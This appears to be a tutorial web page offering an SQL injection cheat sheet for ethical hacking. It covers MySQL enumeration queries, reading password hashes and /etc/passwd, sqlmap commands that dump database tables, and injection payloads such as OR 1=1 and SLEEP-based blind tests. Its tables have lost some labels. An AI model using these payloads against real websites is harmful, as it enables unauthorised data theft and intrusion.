SQL injection is a common vulnerability in web applications that can be exploited to inject malicious SQL code into a database. An attacker who knows the correct syntax for injecting SQL commands into an application’s back end could use this to execute unauthorized or destructive actions on behalf of the target user. An ethical hacker should always test for and identify potential SQL injection vulnerabilities, as they are one of the most frequently used attacks in today’s digital world.
The whole purpose of the Cheat Sheet is to provide you with some quick, accurate ready-to-use commands and necessary Sqlmap queries to help you with SQL Injections.
Basics of SQL:
|
S. No. |
Parameters |
SQL Queries/Examples |
|---|---|---|
|
1. |
SELECT @@version; |
|
|
2. |
/ / or # |
|
|
3. |
SELECT user(); || SELECT system_user() |
|
|
4. |
SELECT user FROM mysql.user; |
|
|
5. |
SELECT host, user, password FROM mysql.user; |
|
|
6. |
SELECT database() |
|
|
7. |
SELECT schema_name FROM information_schema.schemata; || SELECT distinct(db) FROM mysql.db |
|
|
8. |
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
|
|
9. |
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
|
|
10. |
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; |
|
|
11. |
SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5); # >= 5.0.12 |
|
|
12. |
UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) |
|
|
13. |
Hostname/IP Address |
SELECT @@hostname; |
|
14. |
CREATE USER test1 IDENTIFIED BY ‘pass1′; |
|
|
15. |
SELECT @@datadir; |
Basic Commands of SQLMap:
|
S. No |
Parameters |
SQLMap Queries Syntax |
|---|---|---|
|
1. |
sqlmap -u “Vulnerable URL” –dbs |
|
|
2. |
sqlmap -u “Vulnerable URL” –table -D [Name of database] |
|
|
3. |
sqlmap -u “Vulnerable URL” –columns -D [Name of database] -T [table name] |
|
|
4. |
sqlmap -u “Vulnerable URL” –dump -D [Name of database] -T [table name] |
Manually Attacks on SQLMap:
| S. No. | Manually Attack Parameters | SQLMap Queries/Examples |
|---|---|---|
| 1. | Quick detect INTEGERS | select 1 and row(1,1)>(select count(),concat(CONCAT(@@VERSION),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1)) |
| 2. | Quick detect STRINGS | ‘+(select 1 and row(1,1)>(select count(),concat(CONCAT(@@VERSION),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))+’ |
| 3. | Clear SQL Test | product.php?id=4 product.php?id=5-1 product.php?id=4 OR 1=1 product.php?id=-1 OR 17-7=10 |
| 4. | Blind SQL Injection | SLEEP(25)– SELECT BENCHMARK(1000000,MD5(‘A’)); |
| 5. | Real world sample | ProductID=1 OR SLEEP(25)=0 LIMIT 1– ProductID=1) OR SLEEP(25)=0 LIMIT 1– ProductID=1′ OR SLEEP(25)=0 LIMIT 1– ProductID=1′) OR SLEEP(25)=0 LIMIT 1– ProductID=1)) OR SLEEP(25)=0 LIMIT 1– ProductID=SELECT SLEEP(25)– |
You can also learn more about SQL Injections from the article: How to use SQLMAP to test a website for SQL Injection vulnerability.
Feeling lost in OS, DBMS, CN, SQL, and DSA chaos? Our Complete Interview Preparation Course is the ultimate guide to conquer placements. Trusted by over 100,000+ lazyroar, this course is your roadmap to interview triumph.
Ready to dive in? Explore our Free Demo Content and join our Complete Interview Preparation course.
